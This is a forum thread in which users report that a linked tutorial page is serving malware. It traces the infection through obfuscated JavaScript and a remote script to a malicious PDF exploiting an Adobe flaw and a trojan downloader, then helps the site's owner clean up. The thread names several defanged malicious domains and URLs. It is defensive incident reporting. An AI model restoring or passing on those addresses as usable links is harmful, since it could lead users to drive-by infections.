mike dutch site linking to malware

[zanzizzi]

Hi.

Last nite I was having a look at the following site http://mike.dutch.home.comcast.net/~mike.dutch/ I got the link somewhere here at Gizmo, I can't quite remember where exactly. The very first link that I clicked on was w(DONT CLICK)w[DOT]mapelli[DOT]info/tips/ultimate-google-search-tips-guide. In the tutorials section. As soon as the page opened my antivirus detected malware so I got out of there. I checked at mywot and a comment their also said the site contained a trojan.

I just wanted to let people know. Of course I don't know for sure that it is not a false positive.

[Anupam]

You are right. I use NoScript add-on for Firefox, and Avast as my antivirus.

When I opened the page with NoScript on, the page opened without any problem. When I chose NoScript to temporarily allow the scripts on the site... Avast detects problem with the site.

Shows how much NoScript can help in safe browsing. Its a must for any Firefox user. Also shows Avast is a good antivirus too .

Thanks for sharing this information about malware on the link. Appreciated.

Thanks for the heads up.

Every now and then Microsoft Word goes bonkers and swaps the links. For example, link1 goes down a few table entries. It's quite a hastle to fix (have to redo the entire web page) so I don't do it very often. You can always get to the right link by cut & paste.

I've had a few issues where some links have gone "bad" over time. This means that what used to be valid websites may no longer be valid. I try to delete these so please continue letting me know of any infected links.

Thanks,
Mike

[computerfreaker]

Quote:

Originally Posted by zanzizzi

Hi.

Last nite I was having a look at the following site http://mike.dutch.home.comcast.net/~mike.dutch/ I got the link somewhere here at Gizmo, I can't quite remember where exactly. The very first link that I clicked on was w(DONT CLICK)w[DOT]mapelli[DOT]info/tips/ultimate-google-search-tips-guide. In the tutorials section. As soon as the page opened my antivirus detected malware so I got out of there. I checked at mywot and a comment their also said the site contained a trojan.

I just wanted to let people know. Of course I don't know for sure that it is not a false positive.

You couldn't be more right.

I like taking out malware, so I went to take a look - Firefox went nuts, warning me that mapelli was a known attack site. I allowed it anyway (NoScript's protecting me) and looked at the page source; I found a nice piece of obfuscated JavaScript. JSUnpack shows that that piece of JS is calling a script on a Chinese domain, hxxp[COLON]//tdscounter[DOT]cn/phpbb/index.php.
I went directly to tdscounter and got another "Known attack site" warning; this time, I decided to let Sandboxie and Opera handle it (I'd use Fx, but Sandboxie & Firefox don't play well with ContentWatch).
I went to mapelli again, this time in a sandboxed Opera session, and Microsoft Forefront Client Security went nuts - "Exploit:Win32/Pdfjsc.CR detected". tdscounter is apparently pushing a drive-by download; I'm OK thanks to NoScript and Sandboxie (ironically, MFCS is going to be more a pain than anything else, since it locks the infected file so I can't analyze it), but anybody who visited will definitely want to run a full-system virus scan.

Cheers!

[computerfreaker]

EDIT: ok, let's try this again. Apparently my last post went into the moderation queue, so I'll post a quick summary here.
The mapelli site is definitely infected. Firefox warns it's an attack site; a look at its source code reveals some nicely-obfuscated JavaScript. I deobfuscated the JS; it's coming from a Chinese site. Microsoft Forefront Client Security, my antivirus program, caught a drive-by download. I was running in a sandbox, though, so it can't hurt me.
That's probably a good enough summary for now; there was more detail in my original post, but I'm sure that original post will show up here shortly.

Anyway, I just got a look at the infected file - it's a malicious PDF. There's been a lot of those going around lately...

I'll drop this off at the SANS Internet Storm Center; in the meantime, for anyone who stumbled into this site, better run your virus scanner.

[computerfreaker]

yep, that was an infected PDF all right, and a whole lot more.
Here's the reply I just got from SANS:

Quote:

Originally Posted by SANS ISC

Hi,

your sample exploits Collab.collectEMailInfo (and probably other Adobe vulnerabilities, too, I didn't check) and if successful downloads this exe:
http://www.virustotal.com/en/analisi...4aa-1263920062 from hfgdcvehuno-dot-com
Thanks for writing in!

VirusTotal flags that trojan .exe as a downloader, so I'll wager the victims of this have more than just an infected PDF and a trojan to worry about.

Can't say this enough: run at least a couple of good virus scanners, such as MalwareBytes Anti-Malware.

Nice catch, zanzizzi.

[Anupam]

Thanks for the detailed info computerfreaker. That was quite some detective work . Well, since the site in question is a known attack site, anyone using Firefox, or another good browser with anti-phishing, and likes... should be safe. Firefox does not let the link open at all. Nevertheless, its good to be aware.

Mike Dutch had said in earlier post that he will look up the link and remove it, but it seems like he has not removed it yet, and the link still exists. Will have to be reminded again, so that some innocent user does not get infected.

[computerfreaker]

Quote:

Originally Posted by Anupam

Thanks for the detailed info computerfreaker. That was quite some detective work .

Actually, the PDF analysis came from the SANS ISC: http://isc.sans.org/
All I did was some JavaScript deobfuscating and some tracing.

Quote:

Originally Posted by Anupam

Well, since the site in question is a known attack site, anyone using Firefox, or another good browser with anti-phishing, and likes... should be safe. Firefox does not let the link open at all. Nevertheless, its good to be aware.

Well, in situations like this I'm always reminded of the famous saying: "Programmers keep trying to build bigger and better *****-proof programs; the Universe keeps trying to build bigger and better *****s. So far, the Universe is winning."
Some people are bound to get hit regardless of what else happens, hence my suggestion to run an AV app or two.
EDIT: sorry, the word filter ate part of my quote. Wonder what's up with that, as I didn't consider that a bad word... :S

Even though Firefox blocks the link, I have to wonder how IE users will fare, especially since IE is well-known for being receptive to drive-bys.

Quote:

Originally Posted by Anupam

Mike Dutch had said in earlier post that he will look up the link and remove it, but it seems like he has not removed it yet, and the link still exists. Will have to be reminded again, so that some innocent user does not get infected.

Meanwhile, I'll do some analysis of that site and see if I can get its ISP to pull it down. I've had limited success doing that before, but still, it's worth a shot.

Also, I noticed you further edited my link. How should I post such links in the future? I've always used hxxp:// in the past with no trouble, but I'm more than happy to accommodate requirements here.

Cheers!

computerfreaker

[Anupam]

Quote:

Originally Posted by computerfreaker

Even though Firefox blocks the link, I have to wonder how IE users will fare, especially since IE is well-known for being receptive to drive-bys.

Latest versions of all modern browsers with anti-attack and anti-phishing abilities should be able to block such sites. I am sure IE8 has such feature too, although I haven't checked. Can't say about the older versions of IE, or other browsers, if they will be able to block such links.

Quote:

Originally Posted by computerfreaker

Meanwhile, I'll do some analysis of that site and see if I can get its ISP to pull it down. I've had limited success doing that before, but still, it's worth a shot.

I think you should wait on that. We will contact Mike Dutch, and ask him to remove the link again. His site is useful with a lot of links to good softwares. In fact, he has made a very exhaustive list. Some bad links might have got into the list. We will ask him again to remove the link, and he should comply. So, hold it .

Quote:

Originally Posted by computerfreaker

Also, I noticed you further edited my link. How should I post such links in the future? I've always used hxxp:// in the past with no trouble, but I'm more than happy to accommodate requirements here.

Yes, I had edited the link further, just to be sure. Here on the forum, and site, we use [COLON] and [DOT] to kill the links, and also do not post it in a link format.

[computerfreaker]

Quote:

Originally Posted by Anupam

Latest versions of all modern browsers with anti-attack and anti-phishing abilities should be able to block such sites. I am sure IE8 has such feature too, although I haven't checked. Can't say about the older versions of IE, or other browsers, if they will be able to block such links.

Glad to hear IE8 will handle that site, but I wonder about IE6 - it's still pretty popular (although Aurora is likely to change that in a hurry).

Quote:

Originally Posted by Anupam

I think you should wait on that. We will contact Mike Dutch, and ask him to remove the link again. His site is useful with a lot of links to good softwares. In fact, he has made a very exhaustive list. Some bad links might have got into the list. We will ask him again to remove the link, and he should comply. So, hold it .

Sorry, I didn't express myself clearly. I was going to see about having the malware site taken down, *not* Mike's.
As it is, that site looks like a legit site that's been hacked; a whois returned the owner's contact info, so I've dropped him an e-mail warning him of the hack.
EDIT: the site owner knows about the hack and is cleaning his site up.

Quote:

Thank you very much.

I was trying to cleanup the code, but I was not able to find the source of the malicious content!

thanks for the precious hint!

I'm going to try to help him with the cleanup; Mike can probably leave his link there, since the infected site should be dis-infected shortly.
EDIT 2: Just dropped the site owner a note specifying how to remove the malicious JavaScript the hacker left. With any luck, the site should be clean soon.

Quote:

Originally Posted by Anupam

Yes, I had edited the link further, just to be sure. Here on the forum, and site, we use [COLON] and [DOT] to kill the links, and also do not post it in a link format.

Ok, thanks. I'll keep that in mind for the future.

Cheers!

computerfreaker